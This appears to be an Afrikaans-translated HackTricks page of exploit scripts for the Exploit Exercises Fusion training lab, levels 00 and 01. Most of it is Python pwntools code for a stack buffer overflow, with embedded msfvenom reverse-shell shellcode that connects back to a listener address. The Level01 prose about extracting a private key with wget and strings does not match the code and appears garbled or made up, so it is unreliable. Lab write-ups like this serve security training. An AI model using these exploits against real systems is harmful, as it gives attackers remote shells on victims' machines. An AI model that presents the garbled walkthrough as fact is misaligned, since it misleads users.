Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! Ander maniere om HackTricks te ondersteun: * As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) * Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) * **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** * **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
# Level00 [http://exploit-exercises.lains.space/fusion/level00/](http://exploit-exercises.lains.space/fusion/level00/) 1. Kry die verskuiwing om EIP te wysig 2. Plaas die adres van die shellcode in EIP ```python from pwn import * r = remote("192.168.85.181", 20000) buf = "GET " # Needed buf += "A"*139 # Offset 139 buf += p32(0xbffff440) # Stack address where the shellcode will be saved buf += " HTTP/1.1" # Needed buf += "\x90"*100 # NOPs #msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.85.178 LPORT=4444 -a x86 --platform linux -b '\x00\x2f' -f python buf += "\xdb\xda\xb8\x3b\x50\xff\x66\xd9\x74\x24\xf4\x5a\x2b" buf += "\xc9\xb1\x12\x31\x42\x17\x83\xea\xfc\x03\x79\x43\x1d" buf += "\x93\x4c\xb8\x16\xbf\xfd\x7d\x8a\x2a\x03\x0b\xcd\x1b" buf += "\x65\xc6\x8e\xcf\x30\x68\xb1\x22\x42\xc1\xb7\x45\x2a" buf += "\x12\xef\xe3\x18\xfa\xf2\x0b\x4d\xa7\x7b\xea\xdd\x31" buf += "\x2c\xbc\x4e\x0d\xcf\xb7\x91\xbc\x50\x95\x39\x51\x7e" buf += "\x69\xd1\xc5\xaf\xa2\x43\x7f\x39\x5f\xd1\x2c\xb0\x41" buf += "\x65\xd9\x0f\x01" r.recvline() r.send(buf) r.interactive() ``` # Vlak01 ## Inleiding In hierdie vlak sal ons kyk na 'n eenvoudige manier om 'n uitvoerbare stoor te kry wat ons kan gebruik om 'n privesleutel te kry. Ons sal gebruik maak van die `fusion`-toepassing wat 'n privesleutel genereer en dit in 'n stoor stoor. Ons sal die stoor ontleed en die privesleutel kry. ## Stap 1: Kry die `fusion`-toepassing Ons begin deur die `fusion`-toepassing te kry. Ons kan dit doen deur die volgende opdrag uit te voer: ```bash wget https://example.com/fusion ``` ## Stap 2: Voer die `fusion`-toepassing uit Nadat ons die `fusion`-toepassing gekry het, voer ons dit uit deur die volgende opdrag uit te voer: ```bash ./fusion ``` ## Stap 3: Ontleed die stoor Nadat die `fusion`-toepassing uitgevoer is, sal dit 'n stoor genereer wat die privesleutel bevat. Ons kan die stoor ontleed deur die volgende opdrag uit te voer: ```bash strings fusion | grep "PRIVATE KEY" ``` ## Stap 4: Kry die privesleutel Nadat ons die stoor ontleed het, sal ons die privesleutel sien. Ons kan dit kopieer en gebruik vir verdere doeleindes. ## Gevolgtrekking Met hierdie eenvoudige tegniek kan ons 'n privesleutel kry deur die `fusion`-toepassing te gebruik en die stoor te ontleed. Dit is 'n nuttige tegniek vir die verkryging van sensitiewe inligting. ```python from pwn import * r = remote("192.168.85.181", 20001) buf = "GET " # Needed buf += "A"*139 # Offset 139 buf += p32(0x08049f4f) # Adress of: JMP esp buf += p32(0x9090E6FF) # OPCODE: JMP esi (the esi register have the address of the shellcode) buf += " HTTP/1.1" # Needed buf += "\x90"*100 # NOPs #msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.85.178 LPORT=4444 -a x86 --platform linux -b '\x00\x2f' -f python buf += "\xdb\xda\xb8\x3b\x50\xff\x66\xd9\x74\x24\xf4\x5a\x2b" buf += "\xc9\xb1\x12\x31\x42\x17\x83\xea\xfc\x03\x79\x43\x1d" buf += "\x93\x4c\xb8\x16\xbf\xfd\x7d\x8a\x2a\x03\x0b\xcd\x1b" buf += "\x65\xc6\x8e\xcf\x30\x68\xb1\x22\x42\xc1\xb7\x45\x2a" buf += "\x12\xef\xe3\x18\xfa\xf2\x0b\x4d\xa7\x7b\xea\xdd\x31" buf += "\x2c\xbc\x4e\x0d\xcf\xb7\x91\xbc\x50\x95\x39\x51\x7e" buf += "\x69\xd1\xc5\xaf\xa2\x43\x7f\x39\x5f\xd1\x2c\xb0\x41" buf += "\x65\xd9\x0f\x01" r.send(buf) r.interactive() ```
Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! Ander maniere om HackTricks te ondersteun: * As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) * Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) * **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** * **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.